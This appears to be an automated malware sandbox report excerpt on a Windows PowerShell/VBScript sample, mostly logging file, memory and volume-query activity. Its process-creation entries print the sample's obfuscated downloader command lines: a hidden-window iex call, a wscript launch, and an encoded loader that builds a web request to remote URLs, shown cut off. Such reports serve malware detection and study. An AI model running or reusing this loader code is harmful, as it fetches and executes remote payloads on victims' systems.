          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
          Source: powershell.exe, 00000000.00000002.1737945306.0000022A2AF37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW*
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
          Source: powershell.exe, 00000003.00000002.1530508582.000002A600228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000003.00000002.1530508582.000002A601C6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
          Source: powershell.exe, 00000007.00000002.2752630395.0000022536E5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: amsi64_7372.amsi.csv, type: OTHER
          Source: Yara matchFile source: amsi64_8008.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\ik473a.vbs'"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\tq5.vbs" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter anetholes klosetternes venushaar paralalia unyttigst stokkemetoder scanted129 loftrum243 nondissipatedly smashendes sammenlignings areographer articulant prossies vesiculating supermishap adolfine prostyle exerted torsken vespoid svejsere frotteers kvrulanter';if (${host}.currentculture) {$bellisserne++;}function gaardspladsens($agerendes){$dafter135=$agerendes.length-$bellisserne;$unburden='substri';$unburden+='ng';for( $unminimizing=5;$unminimizing -lt $dafter135;$unminimizing+=6){$anetholes+=$agerendes.$unburden.invoke( $unminimizing, $bellisserne);}$anetholes;}function sanktionjtr($epigyne){ . ($emanciperingerne) ($epigyne);}$forlngelsers=gaardspladsens 'ol ermtyvekodi.elzcoenoi fronl heldl.nfusanatro/e.cam5unbri.avlsh0koord fo.b(po.omw acceifravrnamentd unpuorealkw zoonsmyxom .ejsn .hudtrecor unend1turne0,npow.zymoc0dacty;predo f,skewantipiseptingu,gn6kundg4brn,b;colla overixforsy6af ta4 malt;fo.ew lawserprepov kom,:barnl1for e2incom1tom,t.te,eo0alloc)b.ytk vill,g skyte retrc kldnk maveochili/l.tre2redis0nazil1tling0c rci0zitta1trkas0nonco1 slu selecfm.ssaiskyd rsi ine ampf .ostochevixdemob/trodd1und.r2ser m1earmu.stra,0exagg ';$fangstknivens=gaardspladsens 'imparupremosaromaeballar unfr-lect,apliengripo,e excenrubritdefin ';$unyttigst=gaardspladsens 'afvrgh danstallesth.stepkommesbevi,: k.nt/dosme/ forgwiter.wpal mwneur..houslavagarlc ccymklovnr hemawannelaskjerd.ndta. svrvcunkinosultampimps/,tammwparanh skva/sp.cksunin,ulo hiborgieostorkrsamtadoptrnitap.lnresunecommerpaxone,hapengowlkdpingeerokkes,usti7affld8unem..,eadmsunharmde eniv,nre>microhforlotsteretkniplpkonklstillg:lingu/rengr/ dimyw susiwbreg.w,onst. samle domsrggepupargui-appelrn,rmaoopryky ethea akkrlgarvk-protoc kandrno.atofe tswfejlmnmesop. decaiembaln irkefresteoanh l/ cifrwchanchattak/,adios alaru.ountbindlsoparaprpian.d scrai thorns.ptiefin.irk ntaechantnvegetd fingei,glosguden7 bekr8abrik.,ydroskri sm lddeim.tte ';$deaktiverende=gaardspladsens 'panor> atol ';$emanciperingerne=gaardspladsens 'bru.hiblideerut,exfyl e ';$almengjordes='loftrum243';$cometlike = gaardspladsens ' h lvequ,drcrespohsura,osniff teser%subcha klunpkun.tptaagedflotaacr.sst tvanacox c%d.mss\auruns nforuskrmscsv jncaiz,eegreensanthof fjerudisjolveksedlitogeblod.. sub,bcentrlteksto olle lati&ultra&tamar sandieophthct ndah c.gaoafplu familtslidb ';sanktionjtr (gaardspladsens 'isos.$impregarri.ltombaorossabgast aso,thlprede:.eseruhanged disksautoomsbeopekontolwretctincrenberigimenzino,eirgded gepurifn ho o=w ter( gam,creto.m excadeloin unch/ ami callit rekvi$obolec stavosuppemsevereunmantthromloghamices,ok rekoeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
